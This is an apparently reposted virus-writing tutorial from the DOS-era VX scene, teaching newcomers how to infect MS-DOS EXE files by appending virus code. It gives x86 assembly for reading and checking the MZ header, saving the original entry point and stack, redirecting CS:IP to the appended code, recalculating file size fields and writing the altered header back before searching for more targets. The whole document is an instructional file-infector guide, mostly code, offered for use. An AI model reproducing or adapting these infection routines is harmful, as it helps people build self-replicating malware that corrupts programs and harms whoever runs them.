3 EXE files: what u gotta do to infect them

eZine lover (@eZine)

Published in 

Janus

 · 28 Apr 2022

EXE files: what you gotta do to infect them!

Most virus groups have a tut on com already so we wont dwell anywhere in COM Viruses
if your reading this TuT you should know the following things to fully grasp it:

• DTA and its offsets ie:Dta+1ah= filename
• at least be able to write a parasitic com virus
• delta offset

if your able to write a parasitic com u should now learn EXE
well to start off with we arent going to show you the basic things like search routines
we will show how ever what differs in infecting EXEs

1. before you calculate the delta offset u need save the PSP

push ds                                       ;save ds segment 
push cs cs                                    ;save all cs 
pop es ds                                     ;ES info

see in here DS = ES= PSP and now thats saed, we will use this in the restore control routine

2. after you calculate your delta offset in a COM virus youd have:

lea si,[bp+TriByte] 
lea di,100h 
mov cx,3 
rep movsb

well in a EXE virus its this:

 lea si,[BP+EXE_IP] 
 lea di,[BP+Saved_IP] 
 mov cx,4 
 rep movsw

now we gonna tell you why, see in the virus , when it ifnects the Original Values in the Exeheader (well go in depth on the header here soon)

are saved in offsets in your virus but they must be copied to a place where they can be saved and thats what this does,
the reason for rep movsw is that each offset is word in size, there are 4 offsets.
after this u can set your DTA as usual and code your search routine
ok now the part most Newcomers to the VX scene find hard. now once a file is found and opened what do you do?
there are many methods, but this tut will discuss the msot simple
ok now that the file is open
read 28 bytes from the file

mov ah,3fh 
mov cx,1ch        ;1ch = 28 
lea dx,[bp+exeheader] 
int 21h

now you have the header in a file. now you MUST do some header stuff so now we will discuss the dreaded (to newbies) Exeheader!

keep in mind all the offsets a word in length

OFFSET               CONTENT 
0h                   EXE indicator MZ or ZM (initials of EXE inventor) 
2h                   PartPag - lenght of last not full page (page = 512 bytes) 
4h                   program length in 512 pages 
6h                   number of things in relocation table 
8h                   header length in Paragraphs (paragraph = 16 bytes) 
0Ah                  minimum memory left in Paragraphs 
0Ch                  maxmimum memory left in Paragraphs 
0Eh                  segment correction for stack ( u know what a stack is right?) 
10h                  stack pointer value 
12h                  Checksum 
14h                  value of EXEs instruction pointer 
16h                  segment correction For CS 
18h                  offset of first thing in relocation table 
1Ah                  number of internal overlays

ok with that down lets go on, now that the headr is read you need to check some shite.

cmp word ptr [bp+exeheader+12h],'ID' ;u can also use 10h 
je close 
cmp word ptr [bp+exeheader+18h],'@' 
je close 
cmp word ptr [bp+exeheader+1Ah],0 ;check see if OVL # = 0 
jne close                         ;if not = 0 close file

ok let me explain dis shit.

the first part checks the word in the Checksum to see if it matches your infection marker (marker can be any 2 bytes)
if the file already ahs been infected we close
if not we check to see if it is a NE or PE file
if it is a NE or PE we close because were infecting DOS executables
and then it checks offset 1Ah in the header to see its over lay #, if zero
this means the file has no internal overlays and we can infect it if it does though we will go to close
(jne - jump if not equal thus if 1Ah isnt not equal to zero clsoe file)
ok next we gotta save the EXEHEADER

save_header: 
mov ax,word ptr [bp+exeheader+10h]            ;get SP in ax 
mov word ptr [bp+exe_sp],ax                   ;save SP 
mov ax,word ptr [bp+Exeheader+16h]            ;get CS in ax 
mov word ptr [bp+exe_cs],ax                   ;save CS 
mov ax,word ptr [bp+exeheader+14h]            ;get IP in ax 
mov word ptr [bp+exe_ip],ax                   ;save IP 
mov ax,word ptr [bp+exeheader+0eh]            ;get SS in ax 
mov word ptr [bp+exe_ss],ax                   ;save SS 
ret                                           ;return

ok explanation:

ok what were doing here is moving AX into each value of theEXEHEADER then once AX is equal to a value in the exeheader
ax is saved in a offset in our virus
we are saving the exe header components;
now comes to cool part. the infection procedure!

first off go to the end of the file ( u do know how rite :) )

then push ax dx to save the results
then there are 2 techniques here u can use

1.
u can set the new offsets of your virus this way

mov cx,10h 
div cx 
sub ax,word ptr [bp+exeheader+8h]

ok see here at first we divide the file size by 10h (16d)

to get the size of the file in paragraphs so we can subtract the header size(located at offset 8h in header) from the file
ok now for the new offsets

mov word ptr [bp+exeheader+14h],dx           ;NEW IP 
mov word ptr [bp+exeheader+16h],ax           ;NEW CS 
mov word ptr [bp+exeheader+0eh],ax           ;NEW SS 
mov word ptr [bp+exeheader+10h],0fffeh       ;NEW SP 
mov word ptr [bp+exeheader+12h],'AP'         ;infection checker

explanation:

now that your at the end of the file dx and ax are at the file end
thus we set the IP to dx which is at the end of the file so now the EXE IP points to what ever code is at the file end, your virus code
same thing goes with the rest of this routine accept for the 0fffeh part, u must set the SP for a large number so
the stack dont over write your virus.

ok now technique 2 for calculating offsets will be discussed it differs slighlty

(if u use this technique do a push bx b4 u save the header)
ok after u are at the file end and AX and dx are pushed

you do this:

mov bx,word ptr [bp+exeheader+8h]            ;BX = Headersize 
mov cl,4                                     ;convert to bytes 
shl bx,cl                                    ;multiply by 16 
sub ax,bx                                    ;subtract header size from file size 
sbb dx,0                                     ;subtract from carry 
mov cx,16d                                   ;cx = 16 
div cx                                       ;file size in para

explanation? u got it.

when we move BX into word ptr [bp+exheader+8h], BX will contain the header size in paragraphs
then we shift left (shl0 the bytes in CX 4 positions like multiplying by 16
then we subtract the file size from bx which gives us the file size without the header
we need , then subtract 0 if the carrier flag is set
then it gets the file size in para like usual then u just calulate yer offsets like i taught.

ok now that thats done
do a pop dx ax this will restore the file size we need this so we can calculate the new file size in the header
(put bx last (pop dx ax bx) if u used techniuqe 2 so u dont destroy f_handle)

calc_size: 
add ax,endvirus-start 
adc dx,0 
mov cx,200h 
div cx 
cmp dx,0 
je continue 
inc ax 
continue: 
mov word ptr [bp+exeheader+4h],ax 
mov word ptr [bp+exeheader+2h],dx

ok now ill explain

this adds our virus size to AX so we can calculate the new PArt Pag and PagCNT
then after our virus is added on it divides the file by 200h (512d) and gets the file size in pages
(one page = 512 bytes)
then if dx is 0 it calculates the new offset otherwise it adds one to ax for rounding purposes

ok with AX holding the new file size in pages and DX the number of pages, we set them as the new Part Pag and Prt CNT
now write your virus code to the file (u know how to do that right)
then go to the header and write back the new virulent exeheader like this:

mov ah,40h 
mov cx,1Ch 
lea dx,[bp+exeheader] 
int 21h

then close the file and go search for more. simple huh?

Virus-X, peace